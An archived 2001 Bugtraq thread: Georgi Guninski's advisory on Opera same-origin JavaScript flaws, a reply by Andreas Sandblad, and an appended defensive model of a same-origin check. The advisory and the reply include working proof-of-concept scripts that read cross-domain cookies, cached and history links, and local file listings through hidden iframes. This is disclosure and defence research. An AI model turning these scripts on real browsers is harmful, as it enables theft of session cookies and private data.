7506949 2001-11-15 16:36 +0200  /96 lines/ Georgi Guninski <guninski@guninski.com>
Sent by: joel@lysator.liu.se
Imported: 2001-11-15  23:00  by Brevbäraren
External recipient: Bugtraq <BUGTRAQ@SECURITYFOCUS.COM>
External replies to: guninski@guninski.com
Recipient: Bugtraq (import) <19770>
Subject: Several javascript vulnerabilities in Opera
------------------------------------------------------------
From: Georgi Guninski <guninski@guninski.com>
To: Bugtraq <BUGTRAQ@SECURITYFOCUS.COM>
Message-ID: <3BF3D2EC.C297CD41@guninski.com>

Georgi Guninski security advisory #51, 2001

Several javascript vulnerabilities in Opera

Systems affected:
Opera 5.12/Windows, Opera 5.0/Linux - probably other versions

Risk: Medium
Date: 15 November 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission.

Disclaimer:
The information in this advisory is believed to be true based on
experiments though it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or  indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Announcement: I am looking for contracts in the security area - check
http://www.guninski.com

Description: Opera is a multiplatform web browser.  There are several
javascript vulnerabilities in it, basically allowing script in a page
to access a page and its properties in another domain - AFAIK
Netscape calls this "Same Origin Vulnerability".  It is possible for a
script in a web page to access at least cookies and links in arbitrary
domains to which the user has access.  It is also possible for a script
to read the links in the user's cache and history, which at least
have privacy implications if not more.  In some cases cookies and
links in the cache/history may contain sensitive information such as
usernames/passwords etc.


Details:
Examine the following scripts:
-1.----------------------------------
// Open the target site in a new window; the opener keeps a handle to it.
a=window.open("http://mail.yahoo.com");
function f()
{
// Cross-domain read that the same-origin policy should block:
xx=a.document.cookie;
alert("hi"+xx);
// Overwrite the target window with a script that repeats the read from
// inside that window (the closing tag is split so the outer document's
// parser does not see the end of the script element).
a.document.open();
a.document.write("<h1>aa</h1><script>x=window.open('http://mail.yahoo.com');setTimeout('z=x.document.cookie;alert(z);',5000)</"+"script>");
a.document.close();
}
// Give the target page time to load before reading from it.
setTimeout("f()",5000);
-----------------------------------

-2.--------------------------------
// The browser's own cache listing is rendered as an HTML page with one
// link per cached URL.
a=window.open("about:cache");
function f()
{
// Cross-domain read of a cached URL (index 2 is just an arbitrary entry).
xx=a.document.links[2];
alert("hi="+xx);
}
setTimeout("f()",5000);
-----------------------------------

In addition the HotJava exploit at
http://www.guninski.com/hotjava1-desc.html works, as Jay@InfoAve.net
pointed out.

Workaround: Disable javascript (Opera suggests enabling "Use cookies
to trace password protected documents")

Vendor status: The vendor was notified on 5 November 2001 and was
asked whether a fix shall be issued and when.  The reply was:
------------------------------------
You should be able to resolve the cookie issue by enabling "Use cookies
to trace password protected documents", which means that pages with
password protection aren't cached, cookies aren't stored, the URL
shouldn't be displayed in History, etc.
This is a "paranoia" option, and makes a few pages unusable.
As you are probably aware, many web technologies aren't very secure,
but it is inconvenient for the user to block these.
This is why the user should be given a choice to block privacy related
information.
------------------------------------

Regards,
Georgi Guninski
http://www.guninski.com
(7506949) /Georgi Guninski <guninski@guninski.com>/(Rewrapped)
Comment in text 7508092 by Andreas Sandblad <sandblad@acc.umu.se>
7508092 2001-11-16 01:37 +0100  /144 lines/ Andreas Sandblad <sandblad@acc.umu.se>
Sent by: joel@lysator.liu.se
Imported: 2001-11-16  04:53  by Brevbäraren
External recipient: Georgi Guninski <guninski@guninski.com>
External copy recipient: Bugtraq <BUGTRAQ@securityfocus.com>
Recipient: Bugtraq (import) <19783>
Comment on text 7506949 by Georgi Guninski <guninski@guninski.com>
Subject: Re: Several javascript vulnerabilities in Opera
------------------------------------------------------------
From: Andreas Sandblad <sandblad@acc.umu.se>
To: Georgi Guninski <guninski@guninski.com>
Cc: Bugtraq <BUGTRAQ@securityfocus.com>
Message-ID: <Pine.A41.4.33.0111160110320.76190-100000@stalin.acc.umu.se>

Dear bugtraq,

I mailed Opera one week ago about a similar javascript vulnerability
in Opera. I was still waiting for any response from Opera when I saw
Guninski's bugtraq post.

One thing that wasn't mentioned and might not be obvious is that the
vulnerability can also be used to list files on the user's
hard drive. This is because the URL file://c:/ is seen as an HTML page
by Opera. Thus we can use document.links to retrieve filenames and
directories.

Opera released 6.0 beta 1 for Windows three days ago and it's also
vulnerable. In fact it's actually much easier to write the script for
it and easier to make the attack invisible since Opera added better
support for iframe.

Opera 6.0 (not 5.x): List files and directories in c:/
<!-- Hidden frame loads the drive root, which Opera renders as an HTML page. -->
<iframe id="rewrite" src="file://c:/" width=0 height=0></iframe>
<script language="javascript">
// javascript: URL that concatenates every link (file or directory name)
// in the frame's document and shows the result.
s="javascript:t=\'\';for(i=0;(c=document.links.item(i));i++){t+=c};alert(t);";
// Navigating the cross-domain frame to the javascript: URL runs it in
// the frame's own context; the browser should refuse this.
setTimeout('parent.rewrite.document.location="'+s+'"',1);
</script>

Opera 6.0 (not 5.x): Get google cookie
<!-- Hidden frame loads the target site. -->
<iframe id="rewrite" src="http://www.google.com/" width=0 height=0></iframe>
<script language="javascript">
// After the frame has loaded, run script in its context to read its cookie.
setTimeout('parent.rewrite.document.location="javascript:alert(document.cookie)"',8000);
</script>

My web demo written for the Opera staff was put on the private URL:
http://www.homer.nu/security/opera/ But I don't see any reason to
keep it private now that Guninski made the bug public.

Sincerely,
Andreas Sandblad


-- 
    _     _
  o' \,=./ `o
     (o o)
-ooO--(_)--Ooo-
(7508092) /Andreas Sandblad <sandblad@acc.umu.se>/(Rewrapped)
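The check that both posts above show Opera skipping, as an added example that is not code from Guninski, Sandblad or Opera: a small model of the same-origin policy applied to the four accesses in the thread (reading document.cookie through a window.open() handle, reading document.links of about:cache, reading document.links of file://c:/, and pointing a cross-domain iframe at a javascript: URL), next to the two accesses a browser must still allow. It uses the modern scheme/host/port definition of an origin; the hostnames attacker.example and intranet.example, the cookie values, the file names and the function names are all constructed for the example.

```javascript
// Added example, not code from the advisory, the reply or Opera: a model of
// the same-origin check the browser should apply before one window or frame
// touches another. All hostnames, cookie values and file names below are
// constructed sample data.

// Reduce a URL to the scheme/host/port tuple that defines its origin.
// about:, javascript:, file: and unparsable URLs get an opaque origin that
// is equal to nothing, which is the conservative choice for a browser.
function originOf(url) {
  let u;
  try { u = new URL(url); } catch (e) { return { opaque: true }; }
  if (u.protocol !== "http:" && u.protocol !== "https:") return { opaque: true };
  const defaultPort = u.protocol === "https:" ? "443" : "80";
  return { opaque: false, scheme: u.protocol, host: u.hostname, port: u.port || defaultPort };
}

function sameOrigin(a, b) {
  const x = originOf(a), y = originOf(b);
  if (x.opaque || y.opaque) return false;
  return x.scheme === y.scheme && x.host === y.host && x.port === y.port;
}

// A window or frame: its current location plus the document loaded there.
class Frame {
  constructor(location, document) { this.location = location; this.document = document; }
}

// Reading document.cookie or document.links of another window, the access
// the window.open() and parent.rewrite scripts in the thread perform.
function readDocumentProperty(callerLocation, frame, prop) {
  if (!sameOrigin(callerLocation, frame.location)) {
    throw new Error("same-origin policy: " + callerLocation + " may not read " +
                    prop + " of " + frame.location);
  }
  return frame.document[prop];
}

// Setting another frame's location to a javascript: URL runs the script in
// that frame's *current* origin, so it needs the same check as a direct
// read. Ordinary navigation is allowed: the caller picks the new URL but
// cannot read what it loads.
function navigateFrame(callerLocation, frame, target) {
  if (target.startsWith("javascript:") && !sameOrigin(callerLocation, frame.location)) {
    throw new Error("same-origin policy: " + callerLocation +
                    " may not run script in " + frame.location);
  }
  frame.location = target;
  return frame.location;
}

// Replay the accesses from the thread against the model and record, for
// each one, whether the browser let it through.
function replayAdvisory() {
  const attacker = "http://attacker.example/";                                   // constructed
  const mail   = new Frame("http://mail.yahoo.com/", { cookie: "Y=sample-session; F=sample" });        // constructed cookie
  const cache  = new Frame("about:cache", { links: ["http://intranet.example/report?user=alice"] });   // constructed
  const drive  = new Frame("file://c:/", { links: ["file:///c:/boot.ini", "file:///c:/Windows/"] });    // constructed
  const google = new Frame("http://www.google.com/", { cookie: "PREF=sample" });                        // constructed cookie

  function attempt(fn) {
    try { return { allowed: true, value: fn() }; }
    catch (e) { return { allowed: false, reason: e.message }; }
  }

  return {
    // Guninski script 1: opener reads the mail window's cookie
    cookieViaOpener: attempt(() => readDocumentProperty(attacker, mail, "cookie")),
    // Guninski script 2: document.links of about:cache
    cacheLinks:      attempt(() => readDocumentProperty(attacker, cache, "links")),
    // Sandblad: document.links of file://c:/ loaded in an iframe
    driveListing:    attempt(() => readDocumentProperty(attacker, drive, "links")),
    // Sandblad: javascript: URL pushed into a cross-domain iframe
    jsUrlIntoGoogle: attempt(() => navigateFrame(attacker, google, "javascript:alert(document.cookie)")),
    // Must still work: a page reading a cookie of its own origin
    ownCookie:       attempt(() => readDocumentProperty("http://mail.yahoo.com/inbox", mail, "cookie")),
    // Must still work: plain navigation of someone else's frame
    plainNavigation: attempt(() => navigateFrame(attacker, google, "http://www.google.com/search?q=x")),
    // Scheme is part of the origin: https and http pages on one host differ
    httpsVsHttp:     sameOrigin("https://mail.yahoo.com/", "http://mail.yahoo.com/"),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(replayAdvisory(), null, 2));
}
```

Run with `node`; the first four entries come back with `allowed: false`, the two legitimate ones with `allowed: true`. The javascript: case is the one worth noting: the caller never reads anything directly, so a check that only guards property reads (the cookie and links accesses) still misses it, which is why `navigateFrame` applies the origin comparison to the frame's current location before accepting that URL.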